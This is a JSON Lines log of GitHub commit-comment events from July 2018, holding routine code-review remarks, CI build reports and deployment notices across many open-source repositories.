{"id":"8026533034","type":"CommitCommentEvent","actor":{"login":"zzzjjjccc"},"repo":{"name":"zzzjjjccc/code"},"payload":{"comment":{"id":29853650,"position":null,"line":null,"path":null,"commit_id":"ed4871ff41b738d913662ba8fd04dca319cbccb1","created_at":"2018-07-27T04:46:37Z","updated_at":"2018-07-27T04:46:37Z","author_association":"OWNER","body":"Change"}},"created_at":"2018-07-27T04:46:37Z"}
{"id":"8026536829","type":"CommitCommentEvent","actor":{"login":"phnomcobra"},"repo":{"name":"phnomcobra/dev5"},"payload":{"comment":{"id":29853654,"position":null,"line":null,"path":null,"commit_id":"db054e517a87553c4d538367c7284e8d039384f0","created_at":"2018-07-27T04:48:22Z","updated_at":"2018-07-27T04:48:22Z","author_association":"OWNER","body":"initial commit"}},"created_at":"2018-07-27T04:48:22Z"}
{"id":"8026538950","type":"CommitCommentEvent","actor":{"login":"jims10d"},"repo":{"name":"jims10d/sportman-loopback"},"payload":{"comment":{"id":29853659,"position":null,"line":null,"path":null,"commit_id":"6694ca5c2039e90b6b42f048db2ae058a440c517","created_at":"2018-07-27T04:49:24Z","updated_at":"2018-07-27T04:49:24Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/5a7e57bc-5410-437d-95a5-d427815f5ebc?env_id=ibm%3Ayp%3Aus-south \"sportman-loopback\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/db4be768-68e6-447f-9187-7d1ee9f620cc?env_id=ibm%3Ayp%3Aus-south \"sportman-loopback\") deployed [sportman-loopback](https://github.com/jims10d/sportman-loopback/releases/tag/deploy-ibm-yp-us-south-jims10d-simpleSpace-20180727-044922 \"deploy-ibm-yp-us-south-jims10d-simpleSpace-20180727-044922\") to [simpleSpace](https://console.bluemix.net/apps/12384bdb-7ac1-45d2-b63b-7d0a3532c568?env_id=ibm:yp:us-south \"ibm:yp:us-south:jims10d:simpleSpace\"), including this commit"}},"created_at":"2018-07-27T04:49:24Z"}
{"id":"8026544193","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29853666,"position":null,"line":null,"path":null,"commit_id":"6740631fdb379f764e8d3007447341f4496dc350","created_at":"2018-07-27T04:51:44Z","updated_at":"2018-07-27T04:51:44Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/error-when-restore-db-backup/93145/25\n"}},"created_at":"2018-07-27T04:51:44Z"}
{"id":"8026544637","type":"CommitCommentEvent","actor":{"login":"adamretter"},"repo":{"name":"eXist-db/docker-existdb"},"payload":{"comment":{"id":29853667,"position":null,"line":null,"path":null,"commit_id":"c8843eef777ad5b2fdeb4711d7a8de97b3c387b6","created_at":"2018-07-27T04:51:55Z","updated_at":"2018-07-27T04:51:55Z","author_association":"MEMBER","body":"Yes exactly :-)\n\nOn 26 July 2018 at 17:50, Duncan Paterson <notifications@github.com> wrote:\n> add links to main repo branches\n> @adamretter like this ?\n>\n> --\n> You are receiving this because you were mentioned.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/eXist-db/docker-existdb/commit/c8843eef777ad5b2fdeb4711d7a8de97b3c387b6\n\n\n\n-- \nAdam Retter\n\nskype: adam.retter\ntweet: adamretter\nhttp://www.adamretter.org.uk\n"}},"created_at":"2018-07-27T04:51:55Z"}
{"id":"8026546482","type":"CommitCommentEvent","actor":{"login":"WillNess210"},"repo":{"name":"tagry/Legends_of_code_and_magic"},"payload":{"comment":{"id":29853677,"position":362,"line":362,"path":"src/Gamer.java","commit_id":"9861f91d59def282221e4e1f2b8c50036e15ef75","created_at":"2018-07-27T04:52:45Z","updated_at":"2018-07-27T04:52:45Z","author_association":"NONE","body":"Unneeded since instanceId should never be below 0"}},"created_at":"2018-07-27T04:52:45Z"}
{"id":"8026549300","type":"CommitCommentEvent","actor":{"login":"blogic"},"repo":{"name":"openwrt/openwrt"},"payload":{"comment":{"id":29853688,"position":9,"line":6,"path":"target/linux/ipq40xx/patches-4.14/071-qcom-ipq4019-use-v2-of-the-kpss-bringup-mechanism.patch","commit_id":"95672e04335ea0d7d8f468cec8f63d593cc6ede6","created_at":"2018-07-27T04:54:05Z","updated_at":"2018-07-27T04:54:05Z","author_association":"CONTRIBUTOR","body":"just 071 ?"}},"created_at":"2018-07-27T04:54:05Z"}
{"id":"8026549941","type":"CommitCommentEvent","actor":{"login":"Lipnevich"},"repo":{"name":"Lipnevich/noxbox"},"payload":{"comment":{"id":29853691,"position":16,"line":27,"path":"app/src/main/java/by/nicolay/lipnevich/noxbox/tools/DateTimeFormatter.java","commit_id":"5d70027e2ee3a098d4c32696fae79d8da2781a3e","created_at":"2018-07-27T04:54:22Z","updated_at":"2018-07-27T04:54:22Z","author_association":"OWNER","body":"Для формата даты используй пожалуйста настройки локали телефона, кажется такой метод уже есть в tools"}},"created_at":"2018-07-27T04:54:22Z"}
{"id":"8026551118","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29853693,"position":null,"line":null,"path":null,"commit_id":"7ca7cccd2ed95cde29c908ea36f43daa86531250","created_at":"2018-07-27T04:54:57Z","updated_at":"2018-07-27T04:54:57Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-989](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-989).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-989-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-27T04:54:57Z"}
{"id":"8026554701","type":"CommitCommentEvent","actor":{"login":"WillNess210"},"repo":{"name":"tagry/Legends_of_code_and_magic"},"payload":{"comment":{"id":29853699,"position":146,"line":146,"path":"src/Gamer.java","commit_id":"9861f91d59def282221e4e1f2b8c50036e15ef75","created_at":"2018-07-27T04:56:32Z","updated_at":"2018-07-27T04:56:32Z","author_association":"NONE","body":"I'd suggest adding a function to addUse for items"}},"created_at":"2018-07-27T04:56:32Z"}
{"id":"8026555059","type":"CommitCommentEvent","actor":{"login":"Xp-Joe"},"repo":{"name":"Xp-Joe/token-profile-1"},"payload":{"comment":{"id":29853701,"position":null,"line":null,"path":null,"commit_id":"07389e2f395d1b92d7f1871c56504d238db5af45","created_at":"2018-07-27T04:56:42Z","updated_at":"2018-07-27T04:56:42Z","author_association":"OWNER","body":"![turingtoken](https://user-images.githubusercontent.com/41712753/43302321-7b607f8c-919c-11e8-8259-c914d128dc9b.png)\r\n"}},"created_at":"2018-07-27T04:56:42Z"}
{"id":"8026559051","type":"CommitCommentEvent","actor":{"login":"hito4t"},"repo":{"name":"embulk/embulk-input-jdbc"},"payload":{"comment":{"id":29853711,"position":5,"line":25,"path":"embulk-input-jdbc/README.md","commit_id":"9fe5f87b02e26b2f3b27b0cae7238b8d38e62c58","created_at":"2018-07-27T04:58:33Z","updated_at":"2018-07-27T04:58:33Z","author_association":"CONTRIBUTOR","body":"`optiomized` should be `optimized`."}},"created_at":"2018-07-27T04:58:33Z"}
{"id":"8026559246","type":"CommitCommentEvent","actor":{"login":"Oleg720"},"repo":{"name":"Oleg720/scpcb-rus"},"payload":{"comment":{"id":29853713,"position":null,"line":null,"path":null,"commit_id":"08865791eef02184b1ad6cfa0ff0a963574147b4","created_at":"2018-07-27T04:58:38Z","updated_at":"2018-07-27T04:58:38Z","author_association":"OWNER","body":"Ну или над \"локализацией\". Тут уж кому как удобнее"}},"created_at":"2018-07-27T04:58:38Z"}
{"id":"8026559380","type":"CommitCommentEvent","actor":{"login":"SergeyMoiseenko"},"repo":{"name":"brrMeow/geeknight-starter"},"payload":{"comment":{"id":29853714,"position":24,"line":90,"path":"client/app/pirates/pirates.component.ts","commit_id":"0380e350b738a1d85acedf38fb5955109f47ea73","created_at":"2018-07-27T04:58:42Z","updated_at":"2018-07-27T04:58:42Z","author_association":"NONE","body":"лучше использовать шаблонные строки вместо конкатенации через `+`, например:\r\n```javascript\r\n`/api/sprint/id/${options.sprint._id}`\r\n```"}},"created_at":"2018-07-27T04:58:42Z"}
{"id":"8026561035","type":"CommitCommentEvent","actor":{"login":"ptpt52"},"repo":{"name":"openwrt/openwrt"},"payload":{"comment":{"id":29853719,"position":9,"line":6,"path":"target/linux/ipq40xx/patches-4.14/071-qcom-ipq4019-use-v2-of-the-kpss-bringup-mechanism.patch","commit_id":"95672e04335ea0d7d8f468cec8f63d593cc6ede6","created_at":"2018-07-27T04:59:29Z","updated_at":"2018-07-27T04:59:29Z","author_association":"CONTRIBUTOR","body":"@blogic \r\nyes. just drop this patch then it works"}},"created_at":"2018-07-27T04:59:29Z"}
{"id":"8026561109","type":"CommitCommentEvent","actor":{"login":"sashaba"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29853720,"position":null,"line":null,"path":null,"commit_id":"0d43751cabad7270d5f773005b3b20d17e078b62","created_at":"2018-07-27T04:59:31Z","updated_at":"2018-07-27T04:59:31Z","author_association":"NONE","body":"so, after uninstalling Code push i was able to build the APK.\r\nThank you."}},"created_at":"2018-07-27T04:59:31Z"}
{"id":"8026561915","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29853721,"position":null,"line":null,"path":null,"commit_id":"9655ee264b3c2db52e7cf57fe0d73e331d2e9461","created_at":"2018-07-27T04:59:52Z","updated_at":"2018-07-27T04:59:52Z","author_association":"NONE","body":"159344647-Different-heat-transfer-algorithms-from-reverse-constructions (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1698 of 1698 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9655ee264b3c2db52e7cf57fe0d73e331d2e9461-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9655ee264b3c2db52e7cf57fe0d73e331d2e9461-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9655ee264b3c2db52e7cf57fe0d73e331d2e9461-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.04%25-green.png)</a>\n"}},"created_at":"2018-07-27T04:59:52Z"}
{"id":"8026568698","type":"CommitCommentEvent","actor":{"login":"ryantheleach"},"repo":{"name":"sk89q/WorldGuard"},"payload":{"comment":{"id":29853740,"position":null,"line":null,"path":null,"commit_id":"f48716ee18b84cd090e530c209420b7c05bdb481","created_at":"2018-07-27T05:02:45Z","updated_at":"2018-07-27T05:02:45Z","author_association":"NONE","body":"I'm failing to see why you posted this on this commit. For help see IRC/WorldGuard forums. For a bug report, take it to the issue tracker.\r\n\r\nThe version linked in your bug report doesn't even correspond to this commit.\r\n\r\nPosting irrelevant information on git commits is likely to be missed.\r\n\r\nHell, even posting **relevant** information on git commits is likely to be missed."}},"created_at":"2018-07-27T05:02:45Z"}
{"id":"8026570360","type":"CommitCommentEvent","actor":{"login":"damccoy1"},"repo":{"name":"UA-ACM-Student-Chapter/UA-ACM-Student-Chapter.github.io"},"payload":{"comment":{"id":29853748,"position":null,"line":null,"path":null,"commit_id":"a8f0a8faf2ac79bbcef4bb283835764c16e0c6a0","created_at":"2018-07-27T05:03:30Z","updated_at":"2018-07-27T05:03:30Z","author_association":"CONTRIBUTOR","body":"Starting to look good! Here's some notes:\r\n\r\nLoading the Google Calendar client library uses up ~281 KB; is it possible to not load this and still get the events? It would save about 500ms in loading. The FormatGoogleCalendar library seemed to be able to do get stuff without loading that client; check out https://github.com/MilanLund/FormatGoogleCalendar/blob/master/src/app.js\r\n\r\n<img width=\"244\" alt=\"capture\" src=\"https://user-images.githubusercontent.com/25187726/43301927-873b4ab8-912d-11e8-84e5-8f2817e4617b.PNG\">\r\n\r\n- From the attached image, the overflow scroll bars are visible, but I don't think they're supposed to be? I would set overflow: none. The boxes otherwise look good, and I like how they are centered and adjust to the screen width! We should use these for the other boxes on the site.\r\n- Personal preference, I like the boxes without the white bottom border for the header.\r\n- Also, finding some way to differentiate the date and location graphically would be good. The year probably also doesn't need to be present in the date.\r\n- I like that clicking on the event takes you to the calendar for more details. I don't have any great suggestion for this, but indicating somehow to the site visitor that they can click it and see more would be helpful.\r\n- Another personal war I'm fighting is against custom fonts. Although the two fonts you included only take up 27 KB, Super Mario Bros. (1985) takes up just around 30 KB! Too many sites load themselves down with stuff to download that doesn't significantly improve the visitor's experience; I'm all for using resources already available to users for speed, even if they're just a little bit less cool looking. However, I might be a bit anal here. Consistently refreshing, there seems to just be about a 100ms difference in loading or not loading the two fonts, so it's not *that* big a deal."}},"created_at":"2018-07-27T05:03:30Z"}
{"id":"8026573617","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29853753,"position":null,"line":null,"path":null,"commit_id":"dfb96fb464dd848bca0086b803e95bbbd7e1d7c0","created_at":"2018-07-27T05:04:57Z","updated_at":"2018-07-27T05:04:57Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - Win64-Windows-7-VisualStudio-14: OK (2951 of 2951 tests passed, 624 test warnings)\n\nMessages:\n\n * 624 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dfb96fb464dd848bca0086b803e95bbbd7e1d7c0-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dfb96fb464dd848bca0086b803e95bbbd7e1d7c0-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-27T05:04:57Z"}
{"id":"8026579858","type":"CommitCommentEvent","actor":{"login":"mick-p1982"},"repo":{"name":"nanoant/CMakePCHCompiler"},"payload":{"comment":{"id":29853776,"position":null,"line":null,"path":null,"commit_id":"2665ddaf9ddaefc54723a59e9bf6a35a9be60f4a","created_at":"2018-07-27T05:07:48Z","updated_at":"2018-07-27T05:07:48Z","author_association":"CONTRIBUTOR","body":"I hope you see this... you asked for my thoughts on wording. \r\n\r\nI think this should be \"starting with MSVC2010\" instead of \"and higher's\" because English makes it very easy to delay the resolution of what a sentence is trying to say without being grammatically incorrect, even though that can easily change the thrust of the sentence and even makes it unintelligible. But yes, \"and higher\" doesn't feel quite like native English either. And I would say that it's easy to gloss over as an afterthought (the fact that this began with 2010 is almost irrelevant compared to that it affects 2017, etc. today.)\r\n\r\nI would not include mention of \"Microsoft.CppCommon.targets\" because I don't think it's that cut and dry. A #12 style link to https://github.com/nanoant/CMakePCHCompiler/issues/12 would not hurt. "}},"created_at":"2018-07-27T05:07:48Z"}
{"id":"8026581671","type":"CommitCommentEvent","actor":{"login":"blogic"},"repo":{"name":"openwrt/openwrt"},"payload":{"comment":{"id":29853780,"position":39,"line":32,"path":"target/linux/ipq40xx/patches-4.14/071-qcom-ipq4019-use-v2-of-the-kpss-bringup-mechanism.patch","commit_id":"95672e04335ea0d7d8f468cec8f63d593cc6ede6","created_at":"2018-07-27T05:08:34Z","updated_at":"2018-07-27T05:08:34Z","author_association":"CONTRIBUTOR","body":"i think this line was accidentially dropped, can you re-add it please ?"}},"created_at":"2018-07-27T05:08:34Z"}
{"id":"8026585597","type":"CommitCommentEvent","actor":{"login":"ptpt52"},"repo":{"name":"openwrt/openwrt"},"payload":{"comment":{"id":29853782,"position":39,"line":32,"path":"target/linux/ipq40xx/patches-4.14/071-qcom-ipq4019-use-v2-of-the-kpss-bringup-mechanism.patch","commit_id":"95672e04335ea0d7d8f468cec8f63d593cc6ede6","created_at":"2018-07-27T05:10:18Z","updated_at":"2018-07-27T05:10:18Z","author_association":"CONTRIBUTOR","body":"which line? show me in the code view?"}},"created_at":"2018-07-27T05:10:18Z"}
{"id":"8026586595","type":"CommitCommentEvent","actor":{"login":"gaxunil"},"repo":{"name":"gaxunil/videojs-contrib-hls"},"payload":{"comment":{"id":29853784,"position":5,"line":97,"path":"package.json","commit_id":"4028d46989807794c7a75f8ee1d9ceea5b5f031c","created_at":"2018-07-27T05:10:46Z","updated_at":"2018-07-27T05:10:46Z","author_association":"OWNER","body":"This is the core change to point to our modified repo."}},"created_at":"2018-07-27T05:10:46Z"}
{"id":"8026592503","type":"CommitCommentEvent","actor":{"login":"LAX18"},"repo":{"name":"calc84maniac/tiboyce"},"payload":{"comment":{"id":29853795,"position":null,"line":null,"path":null,"commit_id":"72e66a2d319d4ccbfa573c0095a96501e8000b8e","created_at":"2018-07-27T05:13:16Z","updated_at":"2018-07-27T05:13:16Z","author_association":"NONE","body":"Yay! I will be sure to build the source and try this out!"}},"created_at":"2018-07-27T05:13:16Z"}
{"id":"8026592542","type":"CommitCommentEvent","actor":{"login":"gaxunil"},"repo":{"name":"gaxunil/videojs-contrib-media-sources"},"payload":{"comment":{"id":29853796,"position":6,"line":672,"path":"src/virtual-source-buffer.js","commit_id":"81227c5de961cd754f88548f2c50f6a1efba54be","created_at":"2018-07-27T05:13:18Z","updated_at":"2018-07-27T05:13:18Z","author_association":"OWNER","body":"Core change to deal with the odd, rare case where sortedSegments.audio.initSegment is undefined."}},"created_at":"2018-07-27T05:13:18Z"}
{"id":"8026592575","type":"CommitCommentEvent","actor":{"login":"agentlewis"},"repo":{"name":"root-systems/cobuy-atomic"},"payload":{"comment":{"id":29853798,"position":27,"line":24,"path":"ui/components/atoms/a001.js","commit_id":"353104a2708103fb37dcbc20fa5a8d63d243e50a","created_at":"2018-07-27T05:13:18Z","updated_at":"2018-07-27T05:13:18Z","author_association":"CONTRIBUTOR","body":"There should only be one element in a story"}},"created_at":"2018-07-27T05:13:18Z"}
{"id":"8026593674","type":"CommitCommentEvent","actor":{"login":"pinpins"},"repo":{"name":"RainbowMiner/RainbowMiner"},"payload":{"comment":{"id":29853803,"position":null,"line":null,"path":null,"commit_id":"c1d8ad78a9d30450ce48be2949037d382b8c884a","created_at":"2018-07-27T05:13:46Z","updated_at":"2018-07-27T05:13:46Z","author_association":"NONE","body":"Yes, it must be correct one"}},"created_at":"2018-07-27T05:13:46Z"}
{"id":"8026594167","type":"CommitCommentEvent","actor":{"login":"amir75rahimi"},"repo":{"name":"cna98/video-link"},"payload":{"comment":{"id":29853805,"position":null,"line":null,"path":null,"commit_id":"c49bb7d9671031da5520a005dbb309f0d2116b2d","created_at":"2018-07-27T05:14:01Z","updated_at":"2018-07-27T05:14:01Z","author_association":"NONE","body":"09130162965\r\nwhats app pm bede "}},"created_at":"2018-07-27T05:14:01Z"}
{"id":"8026599068","type":"CommitCommentEvent","actor":{"login":"SergeyMoiseenko"},"repo":{"name":"brrMeow/geeknight-starter"},"payload":{"comment":{"id":29853822,"position":119,"line":391,"path":"client/app/pirates/pirates.component.ts","commit_id":"0380e350b738a1d85acedf38fb5955109f47ea73","created_at":"2018-07-27T05:16:08Z","updated_at":"2018-07-27T05:16:08Z","author_association":"NONE","body":"для анонимных функций лучше везде использовать  такой синтаксис ` (параметры) => { тело функции }` всегда.\r\nобъявлять их через `function` нужно только тогда, когда без этого не обойтись."}},"created_at":"2018-07-27T05:16:08Z"}
{"id":"8026601064","type":"CommitCommentEvent","actor":{"login":"calc84maniac"},"repo":{"name":"calc84maniac/tiboyce"},"payload":{"comment":{"id":29853826,"position":null,"line":null,"path":null,"commit_id":"72e66a2d319d4ccbfa573c0095a96501e8000b8e","created_at":"2018-07-27T05:16:59Z","updated_at":"2018-07-27T05:16:59Z","author_association":"OWNER","body":"Thanks a lot! I'm planning to make another release soon, but it would help to hear before then if there are still any crashes. (Though no pressure, I'll probably be making the release regardless since there have been a few important bugfixes including this one.)"}},"created_at":"2018-07-27T05:16:59Z"}
{"id":"8026601085","type":"CommitCommentEvent","actor":{"login":"zxd619549999"},"repo":{"name":"zxd619549999/DRPu9jLsaMVXeSMq5srmkinrFLskRVXgMc"},"payload":{"comment":{"id":29853828,"position":null,"line":null,"path":null,"commit_id":"7cf6a740e791f8734fd80b6de958bac8528faebf","created_at":"2018-07-27T05:17:00Z","updated_at":"2018-07-27T05:17:00Z","author_association":"OWNER","body":"https://github.com/zxd619549999/DRPu9jLsaMVXeSMq5srmkinrFLskRVXgMc/settings\r\n我的钱包密码是多少了呀"}},"created_at":"2018-07-27T05:17:00Z"}
{"id":"8026601138","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"ajblane/dcurl"},"payload":{"comment":{"id":29853829,"position":22,"line":134,"path":"src/pow_fpga_accel.c","commit_id":"27a31fd45bb964e2511712e8eee628d36282e4a7","created_at":"2018-07-27T05:17:02Z","updated_at":"2018-07-27T05:17:02Z","author_association":"NONE","body":"We do not have to track the comments.\r\n\r\nFix earlier and discuss more.\r\n\r\n\r\nAjMaChInE <notifications@github.com> 於 2018年7月27日 週五 12:43 寫道：\r\n\r\n> 老師好，\r\n>\r\n> 我對某commit 做 get rebase -i 去修過去commit message，修改完，git push -f 之後發現此留言被刪除.\r\n> 這樣是否正常？ 或者有其他方式避免留言被刪除？\r\n>\r\n"}},"created_at":"2018-07-27T05:17:02Z"}
{"id":"8026605131","type":"CommitCommentEvent","actor":{"login":"davidhuser"},"repo":{"name":"baosystems/dhis2-centos"},"payload":{"comment":{"id":29853834,"position":null,"line":null,"path":null,"commit_id":"d8b65bf31b22dd247b0acf39e2b6805a63d2a81a","created_at":"2018-07-27T05:18:41Z","updated_at":"2018-07-27T05:18:41Z","author_association":"CONTRIBUTOR","body":"@alanthing just noticed a double entry for changing DHIS2 versions in the README"}},"created_at":"2018-07-27T05:18:41Z"}
{"id":"8026607146","type":"CommitCommentEvent","actor":{"login":"blogic"},"repo":{"name":"openwrt/openwrt"},"payload":{"comment":{"id":29853836,"position":39,"line":32,"path":"target/linux/ipq40xx/patches-4.14/071-qcom-ipq4019-use-v2-of-the-kpss-bringup-mechanism.patch","commit_id":"95672e04335ea0d7d8f468cec8f63d593cc6ede6","created_at":"2018-07-27T05:19:32Z","updated_at":"2018-07-27T05:19:32Z","author_association":"CONTRIBUTOR","body":"operating-points-v2 = <&cpu0_opp_table>;"}},"created_at":"2018-07-27T05:19:32Z"}
{"id":"8026614256","type":"CommitCommentEvent","actor":{"login":"lpere"},"repo":{"name":"severalnines/s9s-tools"},"payload":{"comment":{"id":29853858,"position":null,"line":null,"path":null,"commit_id":"32e83bad1b1de0da1f6910fa213687c6e531ac0c","created_at":"2018-07-27T05:22:24Z","updated_at":"2018-07-27T05:22:24Z","author_association":"CONTRIBUTOR","body":"Nice! I like it. :)"}},"created_at":"2018-07-27T05:22:24Z"}
{"id":"8026616275","type":"CommitCommentEvent","actor":{"login":"majekolaitan"},"repo":{"name":"majekolaitan/Robotfriends"},"payload":{"comment":{"id":29853861,"position":null,"line":null,"path":null,"commit_id":"a52d0cdde55ec488deb22abbb5191ea8f0564dc7","created_at":"2018-07-27T05:23:15Z","updated_at":"2018-07-27T05:23:15Z","author_association":"OWNER","body":"Actions are payloads of information that send data from your application to your store."}},"created_at":"2018-07-27T05:23:15Z"}
{"id":"8026633923","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29853893,"position":35,"line":32,"path":"order/serializers.py","commit_id":"bb5c0b8eec2a14cd94046359f74ea932df3cc3e2","created_at":"2018-07-27T05:30:18Z","updated_at":"2018-07-27T05:30:18Z","author_association":"NONE","body":"save(update_fields=[field1, field2])"}},"created_at":"2018-07-27T05:30:18Z"}
{"id":"8026636386","type":"CommitCommentEvent","actor":{"login":"Fray23"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29853901,"position":19,"line":19,"path":"order/serializers.py","commit_id":"bb5c0b8eec2a14cd94046359f74ea932df3cc3e2","created_at":"2018-07-27T05:31:15Z","updated_at":"2018-07-27T05:31:15Z","author_association":"OWNER","body":"хотел воспользоватся serializer.save() потом передумал, сейчас уберу"}},"created_at":"2018-07-27T05:31:15Z"}
{"id":"8026638138","type":"CommitCommentEvent","actor":{"login":"rayamagana"},"repo":{"name":"rayamagana/hello-world"},"payload":{"comment":{"id":29853903,"position":null,"line":null,"path":null,"commit_id":"75bdb904ea45cc4db1ff227324db62e45f8ff81c","created_at":"2018-07-27T05:31:55Z","updated_at":"2018-07-27T05:31:55Z","author_association":"OWNER","body":"I made some changes here because my language was redundant. "}},"created_at":"2018-07-27T05:31:55Z"}
{"id":"8026643137","type":"CommitCommentEvent","actor":{"login":"ajblane"},"repo":{"name":"ajblane/dcurl"},"payload":{"comment":{"id":29853909,"position":5,"line":33,"path":"Makefile","commit_id":"0100646d2d101bb7142e33996c4ffe6ed6a53c49","created_at":"2018-07-27T05:33:49Z","updated_at":"2018-07-27T05:33:49Z","author_association":"OWNER","body":"Check for  925e33421054d0c87d087b9988eadc6cc1c5f315"}},"created_at":"2018-07-27T05:33:49Z"}
{"id":"8026643213","type":"CommitCommentEvent","actor":{"login":"jwunderl"},"repo":{"name":"Microsoft/pxt-common-packages"},"payload":{"comment":{"id":29853910,"position":null,"line":null,"path":null,"commit_id":"a0803916a35e1f7d0aee0146e0bca7caeb201882","created_at":"2018-07-27T05:33:51Z","updated_at":"2018-07-27T05:33:51Z","author_association":"CONTRIBUTOR","body":"That actually was added in my implementation (in the parent of this commit); I changed it to lazily create arrays instead of creating them early"}},"created_at":"2018-07-27T05:33:51Z"}
{"id":"8026645197","type":"CommitCommentEvent","actor":{"login":"majekolaitan"},"repo":{"name":"majekolaitan/Robotfriends"},"payload":{"comment":{"id":29853913,"position":null,"line":null,"path":null,"commit_id":"3eadc04147a5eac36d4e132e79950e8bbb42b0a8","created_at":"2018-07-27T05:34:40Z","updated_at":"2018-07-27T05:34:40Z","author_association":"OWNER","body":"Provider is a React component given to us by the “react-redux” library. It serves just one purpose : to “provide” the store to its child components."}},"created_at":"2018-07-27T05:34:40Z"}
{"id":"8026649620","type":"CommitCommentEvent","actor":{"login":"lihaofd"},"repo":{"name":"lihaofd/incubator-mxnet"},"payload":{"comment":{"id":29853927,"position":null,"line":null,"path":null,"commit_id":"aa8be5d8631b621754d936bd35f0618b245ed048","created_at":"2018-07-27T05:36:31Z","updated_at":"2018-07-27T05:36:31Z","author_association":"OWNER","body":"Add quantization  and dequantization functions. "}},"created_at":"2018-07-27T05:36:31Z"}
{"id":"8026650017","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29853928,"position":null,"line":null,"path":null,"commit_id":"5d31b27e3e6c518f2ce9a6e44527e3a246fb14c3","created_at":"2018-07-27T05:36:41Z","updated_at":"2018-07-27T05:36:41Z","author_association":"NONE","body":"Myoldmopar-patch-1 (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2948 of 2948 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5d31b27e3e6c518f2ce9a6e44527e3a246fb14c3-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5d31b27e3e6c518f2ce9a6e44527e3a246fb14c3-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-27T05:36:41Z"}
{"id":"8026650787","type":"CommitCommentEvent","actor":{"login":"Usamaliaquat123"},"repo":{"name":"syedadeelalirizvi/safety-app"},"payload":{"comment":{"id":29853929,"position":null,"line":null,"path":null,"commit_id":"98b22379d034aac868fad4e0135af33c38dacac5","created_at":"2018-07-27T05:37:01Z","updated_at":"2018-07-27T05:37:01Z","author_association":"NONE","body":"great what about  app.module.prod.ts . when you build apk with --prod mode all pages is set to 2 modules . that's why --prod ngc-started detecting an error ... 👍  🥇  "}},"created_at":"2018-07-27T05:37:01Z"}
{"id":"8026658112","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29853946,"position":80,"line":8393,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"df7ca71d1319b98b61de015d8ee94311bb06aa51","created_at":"2018-07-27T05:39:59Z","updated_at":"2018-07-27T05:39:59Z","author_association":"COLLABORATOR","body":"Maybe add the __Etiyopya__ translation for this too"}},"created_at":"2018-07-27T05:39:59Z"}
{"id":"8026659330","type":"CommitCommentEvent","actor":{"login":"majekolaitan"},"repo":{"name":"majekolaitan/Robotfriends"},"payload":{"comment":{"id":29853949,"position":null,"line":null,"path":null,"commit_id":"3eadc04147a5eac36d4e132e79950e8bbb42b0a8","created_at":"2018-07-27T05:40:28Z","updated_at":"2018-07-27T05:40:28Z","author_association":"OWNER","body":"2. The Store is the object that brings them together. The store has the following responsibilities: Holds application state; Allows access to state via getState(); Allows state to be updated via dispatch(action); Registers listeners via subscribe(listener); Handles unregistering of listeners via the function returned by subscribe(listener). src/index.js - line 4"}},"created_at":"2018-07-27T05:40:28Z"}
